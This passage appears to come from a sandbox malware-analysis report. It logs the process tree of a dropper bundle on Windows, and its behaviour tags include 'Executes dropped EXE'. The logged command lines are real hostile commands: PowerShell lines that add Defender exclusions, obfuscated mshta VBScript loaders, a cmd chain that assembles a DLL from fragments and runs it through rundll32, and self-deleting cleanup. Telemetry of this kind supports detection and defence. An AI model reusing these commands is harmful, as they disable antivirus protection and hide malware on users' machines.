                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1672,1597629488946696752,8090994591252289188,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5132 /prefetch:2
                                                                                              8⤵
                                                                                                PID:5576
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              "cmd.exe" /C taskkill /F /PID 5888 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Pictures\Adobe Films\LQWFv0gZ7BmD1suTOVf36Ppb.exe"
                                                                                              7⤵
                                                                                                PID:8036
                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                  taskkill /F /PID 5888
                                                                                                  8⤵
                                                                                                  • Kills process with taskkill
                                                                                                  PID:4144
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "cmd.exe" /C taskkill /F /PID 5888 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Pictures\Adobe Films\LQWFv0gZ7BmD1suTOVf36Ppb.exe"
                                                                                                7⤵
                                                                                                  PID:4568
                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                    taskkill /F /PID 5888
                                                                                                    8⤵
                                                                                                    • Kills process with taskkill
                                                                                                    PID:6888
                                                                                              • C:\Users\Admin\Pictures\Adobe Films\JEaWNN7YSQLzuJrj8XAYybQi.exe
                                                                                                "C:\Users\Admin\Pictures\Adobe Films\JEaWNN7YSQLzuJrj8XAYybQi.exe"
                                                                                                6⤵
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:4344
                                                                                              • C:\Users\Admin\Pictures\Adobe Films\Lr0lNCDN5Fk3SioEiNKpHsG1.exe
                                                                                                "C:\Users\Admin\Pictures\Adobe Films\Lr0lNCDN5Fk3SioEiNKpHsG1.exe"
                                                                                                6⤵
                                                                                                  PID:5292
                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\Lr0lNCDN5Fk3SioEiNKpHsG1.exe
                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\Lr0lNCDN5Fk3SioEiNKpHsG1.exe"
                                                                                                    7⤵
                                                                                                    • Checks SCSI registry key(s)
                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                    PID:6360
                                                                                                • C:\Users\Admin\Pictures\Adobe Films\dEi9ngs9VZaCo2M1RuAJBml2.exe
                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\dEi9ngs9VZaCo2M1RuAJBml2.exe"
                                                                                                  6⤵
                                                                                                    PID:5304
                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\4Fn86NvU5m7hPby7G_KCS2ZV.exe
                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\4Fn86NvU5m7hPby7G_KCS2ZV.exe"
                                                                                                    6⤵
                                                                                                    • Windows security modification
                                                                                                    • Checks whether UAC is enabled
                                                                                                    • Suspicious use of SetThreadContext
                                                                                                    • System policy modification
                                                                                                    PID:5252
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\28d54b55-1cdc-4d6e-b492-c2a1bc2adcb4\AdvancedRun.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\28d54b55-1cdc-4d6e-b492-c2a1bc2adcb4\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\28d54b55-1cdc-4d6e-b492-c2a1bc2adcb4\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                                                      7⤵
                                                                                                        PID:3148
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\28d54b55-1cdc-4d6e-b492-c2a1bc2adcb4\AdvancedRun.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\28d54b55-1cdc-4d6e-b492-c2a1bc2adcb4\AdvancedRun.exe" /SpecialRun 4101d8 3148
                                                                                                          8⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:4976
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\4Fn86NvU5m7hPby7G_KCS2ZV.exe" -Force
                                                                                                        7⤵
                                                                                                          PID:7908
                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\4Fn86NvU5m7hPby7G_KCS2ZV.exe
                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\4Fn86NvU5m7hPby7G_KCS2ZV.exe"
                                                                                                          7⤵
                                                                                                            PID:7968
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\4Fn86NvU5m7hPby7G_KCS2ZV.exe" -Force
                                                                                                            7⤵
                                                                                                              PID:7960
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c Sun15f67075f27a2b5b.exe
                                                                                                        4⤵
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:1852
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS4FF392F5\Sun15f67075f27a2b5b.exe
                                                                                                          Sun15f67075f27a2b5b.exe
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:2760
                                                                                                          • C:\Users\Admin\AppData\Roaming\8199630.scr
                                                                                                            "C:\Users\Admin\AppData\Roaming\8199630.scr" /S
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:4064
                                                                                                          • C:\Users\Admin\AppData\Roaming\2764723.scr
                                                                                                            "C:\Users\Admin\AppData\Roaming\2764723.scr" /S
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Adds Run key to start application
                                                                                                            PID:1864
                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                              7⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:4532
                                                                                                          • C:\Users\Admin\AppData\Roaming\7449783.scr
                                                                                                            "C:\Users\Admin\AppData\Roaming\7449783.scr" /S
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Checks BIOS information in registry
                                                                                                            • Checks whether UAC is enabled
                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:2400
                                                                                                          • C:\Users\Admin\AppData\Roaming\4719122.scr
                                                                                                            "C:\Users\Admin\AppData\Roaming\4719122.scr" /S
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:2176
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c Sun1577c3e159a3e3815.exe /mixone
                                                                                                        4⤵
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:3928
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS4FF392F5\Sun1577c3e159a3e3815.exe
                                                                                                          Sun1577c3e159a3e3815.exe /mixone
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:2376
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2376 -s 660
                                                                                                            6⤵
                                                                                                            • Program crash
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:4780
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2376 -s 676
                                                                                                            6⤵
                                                                                                            • Program crash
                                                                                                            PID:4840
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2376 -s 636
                                                                                                            6⤵
                                                                                                            • Program crash
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:4600
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2376 -s 716
                                                                                                            6⤵
                                                                                                            • Program crash
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:5872
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2376 -s 884
                                                                                                            6⤵
                                                                                                            • Program crash
                                                                                                            PID:6168
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2376 -s 932
                                                                                                            6⤵
                                                                                                            • Program crash
                                                                                                            PID:3052
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2376 -s 1180
                                                                                                            6⤵
                                                                                                            • Suspicious use of SetThreadContext
                                                                                                            • Program crash
                                                                                                            PID:5292
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2376 -s 1192
                                                                                                            6⤵
                                                                                                            • Loads dropped DLL
                                                                                                            • Program crash
                                                                                                            PID:6316
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im "Sun1577c3e159a3e3815.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS4FF392F5\Sun1577c3e159a3e3815.exe" & exit
                                                                                                            6⤵
                                                                                                              PID:3768
                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                7⤵
                                                                                                                  PID:3172
                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                  taskkill /im "Sun1577c3e159a3e3815.exe" /f
                                                                                                                  7⤵
                                                                                                                  • Kills process with taskkill
                                                                                                                  PID:4940
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c Sun15f1b1f8c669.exe
                                                                                                            4⤵
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:2076
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS4FF392F5\Sun15f1b1f8c669.exe
                                                                                                              Sun15f1b1f8c669.exe
                                                                                                              5⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:3216
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c Sun159ff1acacf.exe
                                                                                                            4⤵
                                                                                                              PID:904
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS4FF392F5\Sun159ff1acacf.exe
                                                                                                                Sun159ff1acacf.exe
                                                                                                                5⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                PID:2200
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS4FF392F5\Sun159ff1acacf.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7zS4FF392F5\Sun159ff1acacf.exe
                                                                                                                  6⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:4080
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS4FF392F5\Sun159ff1acacf.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7zS4FF392F5\Sun159ff1acacf.exe
                                                                                                                  6⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:800
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS4FF392F5\Sun159ff1acacf.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7zS4FF392F5\Sun159ff1acacf.exe
                                                                                                                  6⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:5032
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS4FF392F5\Sun159ff1acacf.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7zS4FF392F5\Sun159ff1acacf.exe
                                                                                                                  6⤵
                                                                                                                    PID:4456
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS4FF392F5\Sun159ff1acacf.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7zS4FF392F5\Sun159ff1acacf.exe
                                                                                                                    6⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:2104
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c Sun152bea652bd7232.exe
                                                                                                                4⤵
                                                                                                                  PID:948
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS4FF392F5\Sun152bea652bd7232.exe
                                                                                                                    Sun152bea652bd7232.exe
                                                                                                                    5⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:3144
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c Sun158d8ef840.exe
                                                                                                                  4⤵
                                                                                                                    PID:1316
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4FF392F5\Sun158d8ef840.exe
                                                                                                                      Sun158d8ef840.exe
                                                                                                                      5⤵
                                                                                                                        PID:2104
                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                          "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS4FF392F5\Sun158d8ef840.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS4FF392F5\Sun158d8ef840.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                                                                                                                          6⤵
                                                                                                                            PID:940
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS4FF392F5\Sun158d8ef840.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS4FF392F5\Sun158d8ef840.exe" ) do taskkill /F -Im "%~NxU"
                                                                                                                              7⤵
                                                                                                                                PID:3300
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\09xU.exE
                                                                                                                                  09xU.EXE -pPtzyIkqLZoCarb5ew
                                                                                                                                  8⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:3472
                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                    "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                                                                                                                                    9⤵
                                                                                                                                      PID:360
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"
                                                                                                                                        10⤵
                                                                                                                                          PID:3172
                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                        "C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )
                                                                                                                                        9⤵
                                                                                                                                          PID:2136
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            "C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
                                                                                                                                            10⤵
                                                                                                                                              PID:5116
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" eCHO "
                                                                                                                                                11⤵
                                                                                                                                                  PID:6040
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
                                                                                                                                                  11⤵
                                                                                                                                                    PID:2252
                                                                                                                                                  • C:\Windows\SysWOW64\control.exe
                                                                                                                                                    control .\R6f7sE.I
                                                                                                                                                    11⤵
                                                                                                                                                      PID:7104
                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
                                                                                                                                                        12⤵
                                                                                                                                                          PID:6584
                                                                                                                                                          • C:\Windows\system32\RunDll32.exe
                                                                                                                                                            C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
                                                                                                                                                            13⤵
                                                                                                                                                              PID:4408
                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
                                                                                                                                                                14⤵
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                PID:3612
                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                    taskkill /F -Im "Sun158d8ef840.exe"
                                                                                                                                                    8⤵
                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                    PID:3580
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c Sun1507db358fce61c0b.exe
                                                                                                                                            4⤵
                                                                                                                                              PID:2224
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c Sun152e52d07b74d9b5.exe
                                                                                                                                              4⤵
                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                              PID:1904
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4FF392F5\Sun152e52d07b74d9b5.exe
                                                                                                                                        Sun152e52d07b74d9b5.exe
                                                                                                                                        1⤵
                                                                                                                                          PID:2176
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                            2⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:1776
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\inst1.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\inst1.exe"
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:2656
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:4168
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\1500708.scr
                                                                                                                                                "C:\Users\Admin\AppData\Roaming\1500708.scr" /S
                                                                                                                                                4⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:4920
                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  5⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:4456
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\4205580.scr
                                                                                                                                                "C:\Users\Admin\AppData\Roaming\4205580.scr" /S
                                                                                                                                                4⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Suspicious behavior: SetClipboardViewer
                                                                                                                                                PID:5052
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\5993784.scr
                                                                                                                                                "C:\Users\Admin\AppData\Roaming\5993784.scr" /S
                                                                                                                                                4⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Windows security modification
                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                • System policy modification
                                                                                                                                                PID:3244
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\02d17583-6889-46aa-ae8d-1f9eab43eadd\AdvancedRun.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\02d17583-6889-46aa-ae8d-1f9eab43eadd\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\02d17583-6889-46aa-ae8d-1f9eab43eadd\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                                                                                                  5⤵
                                                                                                                                                    PID:6724
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\02d17583-6889-46aa-ae8d-1f9eab43eadd\AdvancedRun.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\02d17583-6889-46aa-ae8d-1f9eab43eadd\AdvancedRun.exe" /SpecialRun 4101d8 6724
                                                                                                                                                      6⤵
                                                                                                                                                        PID:7164
                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\5993784.scr" -Force
                                                                                                                                                      5⤵
                                                                                                                                                        PID:4892
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\5993784.scr
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\5993784.scr"
                                                                                                                                                        5⤵
                                                                                                                                                          PID:6576
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 2108
                                                                                                                                                          5⤵
                                                                                                                                                          • Program crash
                                                                                                                                                          PID:4228
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\5993784.scr
                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\5993784.scr"
                                                                                                                                                          5⤵
                                                                                                                                                            PID:4880
                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\5993784.scr" -Force
                                                                                                                                                            5⤵
                                                                                                                                                              PID:4836
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\7888719.scr
                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\7888719.scr" /S
                                                                                                                                                            4⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Windows security modification
                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                            • System policy modification
                                                                                                                                                            PID:3460
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\bd94a194-c0e0-4465-a933-abe7cf5ad2f5\AdvancedRun.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\bd94a194-c0e0-4465-a933-abe7cf5ad2f5\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\bd94a194-c0e0-4465-a933-abe7cf5ad2f5\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                                                                                                              5⤵
                                                                                                                                                                PID:6064
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\bd94a194-c0e0-4465-a933-abe7cf5ad2f5\AdvancedRun.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\bd94a194-c0e0-4465-a933-abe7cf5ad2f5\AdvancedRun.exe" /SpecialRun 4101d8 6064
                                                                                                                                                                  6⤵
                                                                                                                                                                    PID:7088
                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\7888719.scr" -Force
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:6168
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\7888719.scr
                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\7888719.scr"
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:6220
                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\7888719.scr" -Force
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:2180
                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3460 -s 2236
                                                                                                                                                                        5⤵
                                                                                                                                                                        • Program crash
                                                                                                                                                                        PID:1628
                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\2008686.scr
                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\2008686.scr" /S
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:2868
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\sad.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\sad.exe"
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                    PID:4412
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:4884
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4884 -s 668
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Program crash
                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                      PID:5648
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4884 -s 700
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Program crash
                                                                                                                                                                      PID:5740
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4884 -s 712
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Program crash
                                                                                                                                                                      PID:4996
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4884 -s 740
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Program crash
                                                                                                                                                                      PID:6460
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4884 -s 776
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Program crash
                                                                                                                                                                      PID:7036
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:5072
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\setup.exe
